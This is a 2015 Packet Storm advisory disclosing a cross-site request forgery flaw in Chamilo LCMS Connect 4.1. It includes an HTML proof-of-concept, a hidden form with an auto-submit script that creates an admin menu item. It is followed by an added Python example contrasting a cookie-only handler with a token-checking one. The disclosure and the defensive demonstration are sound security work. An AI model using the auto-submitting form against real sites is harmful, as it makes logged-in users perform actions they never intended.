Chamilo LCMS Connect 4.1 Cross Site Request Forgery

2015-03-27T00:00:00
ID PACKETSTORM:131067
Type packetstorm
Reporter Vadodil Joel Varghese
Modified 2015-03-27T00:00:00

Description

Hi Team,  
  
#Affected Vendor: http://lcms.chamilo.org/  
#Date: 27/03/2015  
#Discovered by: Joel Vadodil Varghese  
#Type of vulnerability: XSRF  
#Tested on: Windows 7  
#Product: LCMS Connect  
#Version: 4.1  
#Description: Chamilo is an open-source (GNU/GPL licensed) e-learning and  
content management system, aimed at improving access to education and  
knowledge globally. Chamilo LCMS is a completely new software platform for  
e-learning and collaboration. The application is vulnerable to cross-site  
request forgery (XSRF): state-changing requests such as the menu-item creation  
in the PoC below are accepted on the strength of the victim's session cookie  
alone, with no unpredictable per-session token in the form. If an attacker  
lures an authenticated user (here an administrator) into clicking a crafted  
link or visiting a web page that embeds a self-submitting copy of the form,  
the victim's browser sends the request together with the victim's cookies,  
and the attacker performs the action with the victim's privileges.  
  
#Proof of Concept (PoC):  
------------------------------------  
<form method="POST" name="form1" action="http://localhost:80/Chamilo/index.php?application=menu&go=creator&type=core\menu\ApplicationItem">  
<input type="hidden" name="parent" value="0"/>  
<input type="hidden" name="title[de]" value=""/>  
<input type="hidden" name="title[en]" value="tester"/>  
<input type="hidden" name="title[fr]" value=""/>  
<input type="hidden" name="title[nl]" value=""/>  
<input type="hidden" name="application" value="weblcms"/>  
<input type="hidden" name="submit_button" value="Create"/>  
<input type="hidden" name="_qf__item" value=""/>  
<input type="hidden" name="type" value="core\menu\ApplicationItem"/>  
</form>  
<!-- Submit as soon as the attacker's page loads: the victim's browser attaches its Chamilo session cookie, so a logged-in admin creates the "tester" menu item without any further interaction. -->  
<script>document.form1.submit();</script>  
  
  
--   
Regards,  
  
*Joel V*  
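The following is an added example, not part of the original advisory and not Chamilo's own code. It models the menu-item creation request from the PoC above as a plain dictionary of POST fields and shows two server-side handlers: one that, like the behaviour the PoC exploits, authorises the request on the cookie-bound session alone, and a hardened one that additionally requires a per-session synchronizer token (compared in constant time) and, when the browser sent an Origin header, a matching origin. The site origin `http://localhost`, the `Session` class and all handler names are assumptions for illustration; the `_qf__item` field is QuickForm's fixed "form was submitted" marker and carries no secret, which is why copying it into the attacker's page costs nothing.

```python
"""Added example (not from the advisory or the Chamilo code base): replays the
PoC's POST against a cookie-only handler and a token-checking handler."""
import hmac
import secrets

# Constructed sample: the fields the PoC form submits. Every value is fixed and
# attacker-known; "_qf__item" is only QuickForm's submitted-marker, not a secret.
POC_FIELDS = {
    "parent": "0",
    "title[en]": "tester",
    "application": "weblcms",
    "submit_button": "Create",
    "_qf__item": "",
    "type": "core\\menu\\ApplicationItem",
}

SITE_ORIGIN = "http://localhost"  # assumed origin of the Chamilo instance


class Session:
    """Stand-in (assumption) for the server-side session a cookie points to."""

    def __init__(self, user, is_admin=True):
        self.user = user
        self.is_admin = is_admin
        # One unguessable token per session, embedded in every state-changing form.
        self.csrf_token = secrets.token_hex(32)


def vulnerable_create_item(session, form, menu):
    """Models what the PoC exploits: the only check is that the cookie-bound
    session is an admin, which the victim's browser satisfies even when the
    POST was triggered by the attacker's page."""
    if session is None or not session.is_admin:
        return False
    menu.append({"title": form.get("title[en]", ""), "type": form.get("type", "")})
    return True


def hardened_create_item(session, form, menu, origin=None):
    """Same action, but the form must carry this session's token (constant-time
    compare) and, if the browser sent an Origin header, it must match the site.
    A page on another origin can read neither the token nor forge the header."""
    if session is None or not session.is_admin:
        return False
    if origin is not None and origin != SITE_ORIGIN:
        return False
    if not hmac.compare_digest(form.get("csrf_token", ""), session.csrf_token):
        return False
    menu.append({"title": form.get("title[en]", ""), "type": form.get("type", "")})
    return True


def legitimate_form(session):
    """What the real creator page would embed: the PoC fields plus the token."""
    return {**POC_FIELDS, "csrf_token": session.csrf_token}


def run_demo():
    """Replays the PoC against both handlers and returns what each accepted."""
    admin = Session("admin")
    vuln_menu, hard_menu = [], []
    return {
        # Attacker's page, victim's cookie: the cookie-only handler creates the item.
        "poc_vs_vulnerable": vulnerable_create_item(admin, POC_FIELDS, vuln_menu),
        # Same request against the hardened handler: no token, wrong origin, rejected.
        "poc_vs_hardened": hardened_create_item(
            admin, POC_FIELDS, hard_menu, origin="http://attacker.example"),
        # Attacker guesses a token value: rejected.
        "guessed_token_vs_hardened": hardened_create_item(
            admin, {**POC_FIELDS, "csrf_token": "0" * 64}, hard_menu),
        # A token from a different session does not transfer: rejected.
        "other_session_token_vs_hardened": hardened_create_item(
            admin, legitimate_form(Session("other")), hard_menu),
        # The admin's own page carries the right token and origin: accepted.
        "legit_vs_hardened": hardened_create_item(
            admin, legitimate_form(admin), hard_menu, origin=SITE_ORIGIN),
        "vulnerable_items": len(vuln_menu),
        "hardened_items": len(hard_menu),
    }


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name}: {outcome}")
```

The Origin check is deliberately secondary: it is only enforced when the header is present, because not every browser of the period sent it on cross-site form posts, so the token remains the control the fix rests on. Binding the token to the session rather than to the page also means the attacker cannot harvest one from their own account and reuse it against the victim.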